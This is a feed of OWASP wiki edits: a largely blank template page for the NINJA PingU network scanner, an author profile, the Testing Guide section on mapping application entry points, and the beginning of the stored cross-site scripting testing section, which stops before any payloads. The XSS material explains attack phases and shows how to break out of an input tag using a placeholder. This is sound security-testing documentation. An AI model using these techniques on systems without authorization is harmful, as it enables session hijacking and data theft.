[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Projects/OWASP_NINJA_PingU_Project/Roadmap&amp;diff=165235</id>
		<title>Projects/OWASP NINJA PingU Project/Roadmap</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Projects/OWASP_NINJA_PingU_Project/Roadmap&amp;diff=165235"/>
				<updated>2014-01-02T16:01:14Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The first beta version has been released.&lt;br /&gt;
The features for future versions involve porting it to other operating systems and creating a UI.&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165234</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165234"/>
				<updated>2014-01-02T15:32:05Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP NINJA PingU: Is Not Just A Ping Utility==&lt;br /&gt;
&lt;br /&gt;
&amp;quot;OWASP NINJA PingU: Is Not Just A Ping Utility&amp;quot; is a free open-source, high performance, network scanner and services discoverage tool for large scale analyses of millions of hosts.&lt;br /&gt;
&lt;br /&gt;
==Introduction==&lt;br /&gt;
&lt;br /&gt;
Write a short introduction&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Write a description that is just a few paragraphs long&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is OWASP NINJA PingU? ==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU  provides:&lt;br /&gt;
&lt;br /&gt;
* Host discoverage&lt;br /&gt;
* Services discoverage&lt;br /&gt;
* Operating System detection&lt;br /&gt;
* Special devices discoverage&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
Link to presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
Guifré Ruiz Utgés &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
* Link to page/download&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Nov 2013] News 2&lt;br /&gt;
* [30 Sep 2013] News 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== In Print ==&lt;br /&gt;
This project can be purchased as a print on demand book from Lulu.com&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
XXX is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
&lt;br /&gt;
= Road Map and Getting Involved =&lt;br /&gt;
As of XXX, the priorities are:&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of XXX is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
Some of the ways you can help:&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165233</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165233"/>
				<updated>2014-01-02T15:29:40Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP NINJA PingU: Is Not Just A Ping Utility==&lt;br /&gt;
&lt;br /&gt;
&amp;quot;OWASP NINJA PingU: Is Not Just A Ping Utility&amp;quot; is a free open-source, high performance, network scanner and services discoverage tool for large scale analyses of millions of hosts.&lt;br /&gt;
&lt;br /&gt;
==Introduction==&lt;br /&gt;
&lt;br /&gt;
Write a short introduction&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Write a description that is just a few paragraphs long&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is OWASP NINJA PingU? ==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU  provides:&lt;br /&gt;
&lt;br /&gt;
* Host Discoverage functionalities&lt;br /&gt;
* Services Discoverage funcion&lt;br /&gt;
* xxx&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
Link to presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
Guifré Ruiz Utgés &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
* Link to page/download&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Nov 2013] News 2&lt;br /&gt;
* [30 Sep 2013] News 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== In Print ==&lt;br /&gt;
This project can be purchased as a print on demand book from Lulu.com&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
XXX is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
&lt;br /&gt;
= Road Map and Getting Involved =&lt;br /&gt;
As of XXX, the priorities are:&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of XXX is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
Some of the ways you can help:&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=147446</id>
		<title>User:Guifre Ruiz</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=147446"/>
				<updated>2013-03-11T11:15:27Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Guifré is a passionate information security engineer, pentester and secure software researcher with strong academic and technical background, whose work is aimed at making the world a safer place.&lt;br /&gt;
&lt;br /&gt;
Most of his work has been open source released in several projects and/or published in papers&amp;amp;conferences. Representative samples of those can be found querying his name in google search, on his linkedin profile, on his blog and also on his twitter timeline.&lt;br /&gt;
&lt;br /&gt;
Guifré is currently part of the Core Development Team of the OWASP ZAP project http://zaproxy.googlecode.com&lt;br /&gt;
&lt;br /&gt;
You can Find out more about me:&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;on 127.0.0.1[http://caos.uab.es/~gruiz]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Blogger[http://guifreruiz.blogspot.com/]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Twitter[http://twitter.com/guifreruiz]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Linkedin[http://www.linkedin.com/in/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on GitHub[https://github.com/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=144518</id>
		<title>User:Guifre Ruiz</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=144518"/>
				<updated>2013-02-15T17:33:31Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Guifré is a passionate information security engineer, pentester and secure software researcher with strong academic and technical background, whose work is aimed at making the world a safer place.&lt;br /&gt;
&lt;br /&gt;
Most of his work has been open source released in several projects and/or published in papers&amp;amp;conferences. Representative samples of those can be found querying his name in google search, on his linkedin profile, on his blog and also on his twitter timeline.&lt;br /&gt;
&lt;br /&gt;
You can Find out more about me:&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;on 127.0.0.1[http://caos.uab.es/~gruiz]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Blogger[http://guifreruiz.blogspot.com/]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Twitter[http://twitter.com/guifreruiz]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Linkedin[http://www.linkedin.com/in/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on GitHub[https://github.com/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Identify_application_entry_points_(OTG-INFO-006)&amp;diff=132450</id>
		<title>Identify application entry points (OTG-INFO-006)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Identify_application_entry_points_(OTG-INFO-006)&amp;diff=132450"/>
				<updated>2012-07-01T15:35:48Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: Included the OWASP Zed Attack Proxy in the interception proxies section.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
Enumerating the application and its attack surface is a key precursor before any thorough testing can be undertaken, as it allows the tester to identify likely areas of weakness. This section aims to help identify and map out areas within the application that should be investigated once enumeration and mapping have been completed.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
Before any testing begins, always get a good understanding of the application and how the user/browser communicates with it.  As you walk through the application, pay special attention to all HTTP requests (GET and POST Methods, also known as Verbs), as well as every parameter and form field that is passed to the application.  In addition, pay attention to when GET requests are used and when POST requests are used to pass parameters to the application.  It is very common that GET requests are used, but when sensitive information is passed, it is often done within the body of a POST request.  Note that to see the parameters sent in a POST request, you will need to use a tool such as an intercepting proxy (for example, OWASP's WebScarab) or a browser plug-in.  Within the POST request, also make special note of any hidden form fields that are being passed to the application, as these usually contain sensitive information, such as state information, quantity of items, the price of items, that the developer never intended for you to see or change.  &lt;br /&gt;
&lt;br /&gt;
In the author's experience, it has been very useful to use an intercepting proxy and a spreadsheet for this stage of the testing.  The proxy will keep track of every request and response between you and the application as you walk through it.  Additionally, at this point, testers usually trap every request and response so that they can see exactly every header, parameter, etc. that is being passed to the application and what is being returned.  This can be quite tedious at times, especially on large interactive sites (think of a banking application). However, experience will teach you what to look for, and, therefore, this phase can be significantly reduced.  As you walk through the application, take note of any interesting parameters in the URL, custom headers, or body of the requests/responses, and save them in your spreadsheet.  The spreadsheet should include the page you requested (it might be good to also add the request number from the proxy, for future reference), the interesting parameters, the type of request (POST/GET), if access is authenticated/unauthenticated, if SSL is used, if it's part of a multi-step process, and any other relevant notes.  Once you have every area of the application mapped out, then you can go through the application and test each of the areas that you have identified and make notes for what worked and what didn't work.  The rest of this guide will identify how to test each of these areas of interest, but this section must be undertaken before any of the actual testing can commence.&lt;br /&gt;
&lt;br /&gt;
Below are some points of interests for all requests and responses.  Within the requests section, focus on the GET and POST methods, as these appear the majority of the requests.  Note that other methods, such as PUT and DELETE, can be used. Often, these more rare requests, if allowed, can expose vulnerabilities.  There is a special section in this guide dedicated for testing these HTTP methods.&lt;br /&gt;
&lt;br /&gt;
'''Requests:'''&lt;br /&gt;
* Identify where GETs are used and where POSTs are used.&lt;br /&gt;
* Identify all parameters used in a POST request (these are in the body of the request).&lt;br /&gt;
* Within the POST request, pay special attention to any hidden parameters.  When a POST is sent all the form fields (including hidden parameters) will be sent in the body of the HTTP message to the application.  These typically aren't seen unless you are using a proxy or view the HTML source code.  In addition, the next page you see, its data, and your access can all be different depending on the value of the hidden parameter(s).&lt;br /&gt;
* Identify all parameters used in a GET request (i.e., URL), in particular the query string (usually after a ? mark).&lt;br /&gt;
* Identify all the parameters of the query string. These usually are in a pair format, such as foo=bar. Also note that many parameters can be in one query string such as separated by a &amp;amp;, ~, :, or any other special character or encoding.&lt;br /&gt;
* A special note when it comes to identifying multiple parameters in one string or within a POST request is that some or all of the parameters will be needed to execute your attacks.  You need to identify all of the parameters (even if encoded or encrypted) and identify which ones are processed by the application.  Later sections of the guide will identify how to test these parameters. At this point, just make sure you identify each one of them.&lt;br /&gt;
* Also pay attention to any additional or custom type headers not typically seen (such as debug=False).&lt;br /&gt;
&lt;br /&gt;
'''Responses:'''&lt;br /&gt;
*Identify where new cookies are set (Set-Cookie header), modified, or added to.&lt;br /&gt;
*Identify where there are any redirects (300 HTTP status code), 400 status codes, in particular 403 Forbidden, and 500 internal server errors during normal responses (i.e., unmodified requests).&lt;br /&gt;
*Also note where any interesting headers are used. For example, &amp;quot;Server: BIG-IP&amp;quot; indicates that the site is load balanced. Thus, if a site is load balanced and one server is incorrectly configured, then you might have to make multiple requests to access the vulnerable server, depending on the type of load balancing used.&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Testing for application entry points:''' &amp;lt;br&amp;gt;&lt;br /&gt;
The following are two examples on how to check for application entry points.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===EXAMPLE 1===&lt;br /&gt;
This example shows a GET request that would purchase an item from an online shopping application.&lt;br /&gt;
&lt;br /&gt;
 GET https://x.x.x.x/shoppingApp/buyme.asp?CUSTOMERID=100&amp;amp;ITEM=z101a&amp;amp;PRICE=62.50&amp;amp;IP=x.x.x.x &lt;br /&gt;
 Host: x.x.x.x&lt;br /&gt;
 Cookie: SESSIONID=Z29vZCBqb2IgcGFkYXdhIG15IHVzZXJuYW1lIGlzIGZvbyBhbmQgcGFzc3dvcmQgaXMgYmFy&lt;br /&gt;
&lt;br /&gt;
'''Result Expected:'''&lt;br /&gt;
&lt;br /&gt;
Here you would note all the parameters of the request such as CUSTOMERID, ITEM, PRICE, IP, and the Cookie (which could just be encoded parameters or used for session state).&lt;br /&gt;
&lt;br /&gt;
===EXAMPLE 2===&lt;br /&gt;
This example shows a POST request that would log you into an application.&lt;br /&gt;
&lt;br /&gt;
 POST https://x.x.x.x/KevinNotSoGoodApp/authenticate.asp?service=login&lt;br /&gt;
 Host: x.x.x.x&lt;br /&gt;
 Cookie: SESSIONID=dGhpcyBpcyBhIGJhZCBhcHAgdGhhdCBzZXRzIHByZWRpY3RhYmxlIGNvb2tpZXMgYW5kIG1pbmUgaXMgMTIzNA==&lt;br /&gt;
 CustomCookie=00my00trusted00ip00is00x.x.x.x00&lt;br /&gt;
&lt;br /&gt;
Body of the POST message:&lt;br /&gt;
&lt;br /&gt;
 user=admin&amp;amp;pass=pass123&amp;amp;debug=true&amp;amp;fromtrustIP=true&lt;br /&gt;
&lt;br /&gt;
'''Result Expected:'''&lt;br /&gt;
&lt;br /&gt;
In this example you would note all the parameters as you have before but notice that the parameters are passed in the body of the message and not in the URL.  Additionally, note that there is a custom cookie that is being used.&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
&lt;br /&gt;
Testing for application entry points via a Gray Box methodology would consist of everything already identified above with one caveat.  This would be if there are any external sources from which the application receives data and processes it (such as SNMP traps, syslog messages, SMTP, or SOAP messages from other servers).  If there are any external sources of input into the application then a meeting with the application developers could identify any functions that would accept or expect user input and how it's formatted.  For example, the developer could help in understanding how to formulate a correct SOAP request that the application would accept and where the web service resides (if the web service or any other function hasn't already been identified during the black box testing).&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 -&lt;br /&gt;
http://tools.ietf.org/html/rfc2616&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Intercepting Proxy:'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*OWASP: [[OWASP WebScarab Project|Webscarab]]&lt;br /&gt;
*OWASP: [[OWASP_Zed_Attack_Proxy_Project| Zed Attack Proxy (ZAP)]]&lt;br /&gt;
*Dafydd Stuttard: Burp proxy -&lt;br /&gt;
http://portswigger.net/proxy/&lt;br /&gt;
*MileSCAN: Paros Proxy - &lt;br /&gt;
http://www.parosproxy.org/download.shtml&lt;br /&gt;
&lt;br /&gt;
'''Browser Plug-in:'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*&amp;quot;TamperIE&amp;quot; for Internet Explorer - &lt;br /&gt;
http://www.bayden.com/TamperIE/&lt;br /&gt;
*Adam Judson: &amp;quot;Tamper Data&amp;quot; for Firefox -&lt;br /&gt;
https://addons.mozilla.org/en-US/firefox/addon/966&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)&amp;diff=132441</id>
		<title>Testing for Stored Cross site scripting (OTG-INPVAL-002)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)&amp;diff=132441"/>
				<updated>2012-07-01T10:40:36Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: I included the OWASP ZAProxy tool in the Tools section.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
Stored Cross Site Scripting (XSS) is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application.&lt;br /&gt;
&lt;br /&gt;
This vulnerability can be used to conduct a number of browser-based attacks including:&lt;br /&gt;
&lt;br /&gt;
* Hijacking another user's browser&lt;br /&gt;
* Capturing sensitive information viewed by application users&lt;br /&gt;
* Pseudo defacement of the application&lt;br /&gt;
* Port scanning of internal hosts (&amp;quot;internal&amp;quot; in relation to the users of the web application)&lt;br /&gt;
* Directed delivery of browser-based exploits&lt;br /&gt;
* Other malicious activities&lt;br /&gt;
&lt;br /&gt;
Stored XSS does not need a malicious link to be exploited. A successful exploitation occurs when a user visits a page with a stored XSS. The following phases relate to a typical stored XSS attack scenario:&lt;br /&gt;
&lt;br /&gt;
* Attacker stores malicious code into the vulnerable page&lt;br /&gt;
* User authenticates in the application&lt;br /&gt;
* User visits vulnerable page&lt;br /&gt;
* Malicious code is executed by the user's browser&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;This type of attack can also be exploited with browser exploitation frameworks such as [http://www.bindshell.net/tools/beef BeEF], [http://xss-proxy.sourceforge.net/ XSS Proxy] and [http://www.gnucitizen.org/projects/backframe/ Backframe]. These frameworks allow for complex JavaScript exploit development.&lt;br /&gt;
&lt;br /&gt;
Stored XSS is particularly dangerous in application areas where users with high privileges have access. When the administrator visits the vulnerable page, the attack is automatically executed by their browser. This might expose sensitive information such as session authorization tokens.&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Input Forms'''&lt;br /&gt;
&lt;br /&gt;
The first step is to identify all points where user input is stored into the back-end and then displayed by the application.  Typical examples of stored user input can be found in:&lt;br /&gt;
&lt;br /&gt;
* User/Profiles page: the application allows the user to edit/change profile details such as first name, last name, nickname, avatar, picture, address, etc.&lt;br /&gt;
* Shopping cart: the application allows the user to store items into the shopping cart which can then be reviewed later&lt;br /&gt;
* File Manager: application that allows upload of files&lt;br /&gt;
* Application settings/preferences: application that allows the user to set preferences&lt;br /&gt;
&lt;br /&gt;
'''Analyze HTML code'''&lt;br /&gt;
&lt;br /&gt;
Input stored by the application is normally used in HTML tags, but it can also be found as part of JavaScript content. At this stage, it is fundamental to understand if input is stored and how it is positioned in the context of the page.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Example&amp;lt;/b&amp;gt;: Email stored data in index2.php&lt;br /&gt;
&lt;br /&gt;
[[Image:Stored_input_example.jpg]]&lt;br /&gt;
&lt;br /&gt;
The HTML code of index2.php where the email value is located:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;input class=&amp;quot;inputbox&amp;quot; type=&amp;quot;text&amp;quot; name=&amp;quot;email&amp;quot; size=&amp;quot;40&amp;quot; value=&amp;quot;aaa@aa.com&amp;quot; /&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In this case, the pen-tester needs to find a way to inject code outside the &amp;lt;input&amp;gt; tag as below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;input class=&amp;quot;inputbox&amp;quot; type=&amp;quot;text&amp;quot; name=&amp;quot;email&amp;quot; size=&amp;quot;40&amp;quot; value=&amp;quot;aaa@aa.com&amp;quot;&amp;gt; MALICIOUS CODE &amp;lt;!-- /&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Testing for Stored XSS'''&lt;br /&gt;
&lt;br /&gt;
This involves testing the input validation/filtering controls of the application. Basic injection examples in this case:&lt;br /&gt;
&lt;br /&gt;
